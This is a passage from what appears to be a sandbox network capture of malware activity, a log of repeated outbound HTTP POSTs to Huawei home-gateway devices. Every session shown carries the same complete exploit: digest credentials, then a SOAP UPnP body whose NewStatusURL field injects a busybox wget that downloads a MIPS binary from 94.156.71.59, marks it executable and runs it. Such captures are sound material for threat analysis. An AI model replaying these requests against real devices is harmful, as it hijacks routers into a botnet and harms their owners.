                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1057192.168.2.1353608197.123.251.4137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.607466936 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1058192.168.2.134162441.79.254.19937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.610219955 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1059192.168.2.133875441.148.193.8837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.612243891 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1060192.168.2.1337614197.35.164.14237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.614727974 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1061192.168.2.1351626156.151.63.4737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.617851019 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1062192.168.2.1350768156.80.160.11337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.620903969 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1063192.168.2.1342114197.49.91.20237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.623698950 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1064192.168.2.1336390197.39.9.14437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.626343012 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1065192.168.2.1348894197.159.231.6037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.629185915 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1066192.168.2.1360608197.198.151.22337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.632114887 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
